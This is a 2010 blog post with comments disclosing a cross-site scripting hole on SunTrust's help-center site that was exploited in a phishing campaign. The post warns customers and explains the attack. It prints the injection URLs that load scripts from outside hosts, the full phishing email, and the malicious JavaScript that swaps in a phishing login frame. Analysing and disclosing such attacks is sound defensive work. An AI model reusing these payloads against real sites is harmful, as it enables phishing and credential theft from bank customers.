?

Log in

Previous Entry | Next Entry

OUCH! SunTrust's Web site is PWN3d!

I know some of my regular readers have accounts with SunTrust bank. If you do, and you recently received an email telling you that your account records need to be updated, and you clicked on any link in that email, change your account password IMMEDIATELY. It is not necessary for you to have typed in your account username and password at the prompt; the attack can lift the SunTrust cookies from your browser.

You see, SunTrust left a security hole in their Web server; this security hole allows an attacker to use what's called a "cross site scripting" attack to take control of the pages you see when you browse to SunTrust URLs.

I have confirmed this security hole exists, and have created a quick demo to show how it works. If you click on this link:

Clicky here
[EDIT:] Within 5 minutes of my making this post, LiveJournal's servers flagged the link as a cross-site scripting link and disabled it. Nicely done! Kudos to the LJ team for making their software aware of hostile links. If you want to try out my demo of the vulnerability, copy into your browser:

http://helpcenter.suntrust.com/doc/sn6400.xml?SID=586&TOPNAME=%22%3E%3C/a%3E%3Cscript%20src=%22http://www.obsidianfields.com/suntrustxssdemo/xssdemo.js

you will be taken to the Web site helpcenter.suntrust.com, a legitimate SunTrust Web page.

[UPDATE]: As of Wednesday afternoon, SunTrust's IT people have fixed the XSS hole.

But wait! What do you see? If the security hole still exists when you visit this URL, you'll see a red Web page reading "The cross-site scripting vulnerability at helpcenter.suntrust.com IS STILL ACTIVE". What's going on?

What's going on is that helpcenter.suntrust.com can be fooled just by manipulating the URL into loading content from anywhere on the Web, overwriting whatever is supposed to be there. No, I don't have access to the SunTrust servers directly, and neither does the attacker. What I CAN do is create a Web page with anything I want, and then create a link that causes my Web page to load at helpcenter.suntrust.com in place of what is supposed to be there. And, if I wanted to, I could also read SunTrust cookies stored in your browser as well, presumably including login cookies if you have ticked the "remember me" checkbox on SunTrust's login page.

In English, that means you can not trust anything you see displayed at helpcenter.suntrust.com, even if you are 100% positive that the URL of your browser is in fact helpcenter.suntrust.com. It is trivial to create malicious links that change the content displayed at helpcenter.suntrust.com, as I haveshown in my example. This security hole is currently being used in a "phishing" attack that shows you what looks like a perfectly legitimate login page at helpcenter.suntrust.com, but is in fact a page under the control of the hacker on a hacked Web server in Australia.



The attack is currently using a phony email with the title "Your account records have not been updated for too long". This email looks like a bog-standard phishing attack of the kind we all see fifteen or twenty times a day. The full email looks like this:

Return-Path: <saojorge@linux.linuxcpanelhost.com>
Received: from mtain-md04.r1000.mx.aol.com (mtain-md04.r1000.mx.aol.com [172.29.96.88]) by air-de06.mail.aol.com (v129.4) with ESMTP id MAILINDE061-5eb64bf34aeb237; Tue, 18 May 2010 22:20:27 -0400
Received: from linux.linuxcpanelhost.com (linux.linuxcpanelhost.com [74.86.210.130])
by mtain-md04.r1000.mx.aol.com (Internet Inbound) with ESMTP id 521D03800009D
for <tacitr@aol.com>; Tue, 18 May 2010 22:20:27 -0400 (EDT)
Received: from saojorge by linux.linuxcpanelhost.com with local (Exim 4.69)
(envelope-from <saojorge@linux.linuxcpanelhost.com>)
id 1OEVAI-0005bM-Di
for tacitr@aol.com; Tue, 18 May 2010 19:21:06 -0300
To: tacitr@aol.com
Subject: Your account records have not been updated for too long
MIME-Version: 1.0
Content-type: text/html; charset=UTF-8
From: SunTrust <support@en.suntrust.com>
Message-Id: <E1OEVAI-0005bM-Di@linux.linuxcpanelhost.com>
Date: Tue, 18 May 2010 19:21:06 -0300
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - linux.linuxcpanelhost.com
X-AntiAbuse: Original Domain - aol.com
X-AntiAbuse: Originator/Caller UID/GID - [1063 32007] / [47 12]
X-AntiAbuse: Sender Address Domain - linux.linuxcpanelhost.com
X-Source:
X-Source-Args:
X-Source-Dir:
x-aol-global-disposition: S
x-aol-sid: 3039ac1d60584bf34aeb424c
X-AOL-IP: 74.86.210.130
X-Mailer: Unknown (No Version)


<div style="padding:15px;font-family:arial;font-size:12px"><p style="margin:0 0 15px 0"><b>Hello tacitr,</b></p>
<p style="margin:0 0 20px 0"><span style="font-size:14px;color:red"><b>Your account records haven't been updated for too long</b></span><br><br>
Please note that some of your personal information might be outdated.<br>To reactivate your account, please visit our Help Center:</p>
<p style="margin:0 0 20px 0"><a href="http://helpcenter.suntrust.com/doc/sn6400.xml?SID=5869ef9427faf3a485d236a6ec2ccabdff1f394b903709f3da2a96d99989532b04a1158347e000bc4832bed19b3cc21863a836f0ac43a73de1f1f3b09408808f152c25c47ed28cb799ccb1b5ea2d6715d3411586f03338d3852223611642889d&TOPNAME=%22%3E%3C/a%3E%3Cscript%20src=%22http://124.217.229.185/~demadm/logs/help.js%22%3E%3C/script%3E%3Cparam%20class=%22&UID=75178461717441605271041666529446753430202992796716260595685782413851209232661" target="_blank">
http://helpcenter.suntrust.com/doc/sn6400.xml?SID=5869ef9427faf3a485d236a...</a></p><p style="margin:0 0 20px 0">Best regards,<br>SunTrust Customer Service<br><br>
<span style="color:gray">SunTrust Bank,<br>P.O. Box 4418 GA-Atlanta-0795,<br>Atlanta, GA 30302-4418</span></p></div>




The interesting thing you will notice about this phish, which makes it very different from garden-variety phishing attacks, is that it actually contains a real SunTrust URL. The SunTrust Web page at

http://helpcenter.suntrust.com/doc/sn6400.xml

contains a type of security hole known as a "cross-site scripting flaw". In simple terms, it means that the Web page is poorly created in such a way that I can trick it into loading and running a JavaScript from anywhere on the Web.

In this case, what happens is that the Web page at http://helpcenter.suntrust.com/doc/sn6400.xml is being used to load and run a JavaScript located at http://124.217.229.185/~demadm/logs/help.js. Look closely at the URL in the attack email. See all the junk after the question mark? Most of that junk is bogus, just there to throw off non-technical Web users.




The URL in the email can be divided into several parts:

http://helpcenter.suntrust.com/doc/sn6400.xmlSID=5869...(and so on)...&TOPNAME=%22%3E%3C/a%3E%3Cscript%20src=%22http://124.217.229.185/~demadm/logs/help.js%22%3E%3C/...(and so on)...

The stuff in blue is the SunTrust Web page. The stuff after that is made up of things that are given to the Web page so that it knows what to do. Normally, it would just be the first part in red, which I imagine would be a number corresponding to a text file to display.

Ah, but the part in green...

The Web designers at SunTrust did not check to see what was being passed to the Web page. The Web page will blindly accept and execute anything that it is passed. The part in green is the address of a malicious JavaScript. When it is passed to the Web page, the Web page executes the script, without regard to where it came from, and displays the result.

Here is the contents of the malicious script:

document.title = 'SunTrust - Identification';

document.write('<style>');
document.write('html {');
document.write('height: 100%;');
document.write('overflow: hidden;');
document.write('}');
document.write('body {');
document.write('overflow: hidden;');
document.write('height: 100%;');
document.write('margin: 0;');
document.write('}');
document.write('iframe {');
document.write('border: 0;');
document.write('overflow: auto;');
document.write('overflow-x: hidden;');
document.write('margin: 0;');
document.write('width: 100%;');
document.write('height: 100%;');
document.write('}');
document.write('body table {');
document.write('display: none;');
document.write('}');
document.write('</style>');


document.write('<iframe id="mainframe" name="mainframe" src="http://designcats.com.au/forms/language/v/" frameborder="0" border="0"></iframe>');

window.onload = function() {
var frm = document.getElementById('mainframe');
document.body.appendChild(frm);
}

If you don't know JavaScript, basically what this script instructs the page to do is:

1. Change the title of the page to read "SunTrust: identification";
2. Hide the content of the page;
3. Load new content from http://designcats.com.au/forms/language/v/ and show it.

The Web site at designcats.com.au is a hacked site that the hacker has placed a phish page on. So the email contains a real SunTrust Web site address, with instructions to load a script that will blank out the page and replace it with the phish page. The hacker's phish page also attempts to load any SunTrust cookies, if it can.

You can see the results by clicking on the link I've placed above, which replaces the script at http://124.217.229.185/~demadm/logs/help.js with a script located on my server, which loads a red page reading "The cross-site scripting vulnerability at helpcenter.suntrust.com IS STILL ACTIVE." If you click on my link, you'll see the real SunTrust page load, then the screen will flicker as my script loads, then the page will turn red and show you the warning. If you just go to http://helpcenter.suntrust.com without any parameters, you'll see the page you should see. I've written to SunTrust to notify them that they have a security problem. Normally, I would not describe the problem or how it works until after they fix it. However, in this case, the security problem has already been discovered by the hacker underground and is being used in current, active attacks, so attempting to keep it secret at this point is pretty useless.


Comments

( 9 comments — Leave a comment )
ashbet
May. 19th, 2010 02:01 pm (UTC)
Eeesh -- thanks for this, I'm a SunTrust customer, and I'll avoid their site for a bit until this is cleared up.

-- A <3
radven
May. 19th, 2010 03:00 pm (UTC)
You are a crime fighting super hero.

You really need a cape.
rekre8
May. 19th, 2010 07:04 pm (UTC)
What sort of logo would he put on his full-body lycra outfit? And would it be legal in all 50 states?
make_your_move
May. 19th, 2010 03:37 pm (UTC)
So I should *not* check my checking account online for the time being? This would make me very, very sad.

Since I don't understand all the tech stuff - I just want to be sure that what your saying is "don't log into suntrust right now"


tacit
May. 19th, 2010 10:53 pm (UTC)
As long as you go directly to the main page of the SunTrust site, you're OK. The hole existed (it's beenfixed as of this afternoon) in their help center; any URL beginning with helpcenter.suntrust.com could potentially have been compromised.
simbamco
May. 19th, 2010 05:12 pm (UTC)
I have received those phishing attempts via e-mail for Suntrust in the past and am a Suntrust customer, but I'm savvy enough to know a phishing e-mail when I see one. I don't click the links. I just pull up the e-mail's full source and send it to their fraud department.
rekre8
May. 19th, 2010 07:07 pm (UTC)
So is this new or is this the same issue discussed in 2004?
http://www.snopes.com/fraud/phishing/suntrust.asp
tacit
May. 19th, 2010 10:55 pm (UTC)
It isn't quite the same issue, but it's similar. In the one documented on Snopes, hackers rigged a phony popup in front of Suntrust's window; in this one, they actually placed a phony login page inside the SunTrust window.
(Anonymous)
Sep. 13th, 2013 05:13 am (UTC)
Hey! Do you know if they make any plugins to protect against hackers?
I'm kinda paranoid about losing everything I've worked hard on.
Any recommendations?
( 9 comments — Leave a comment )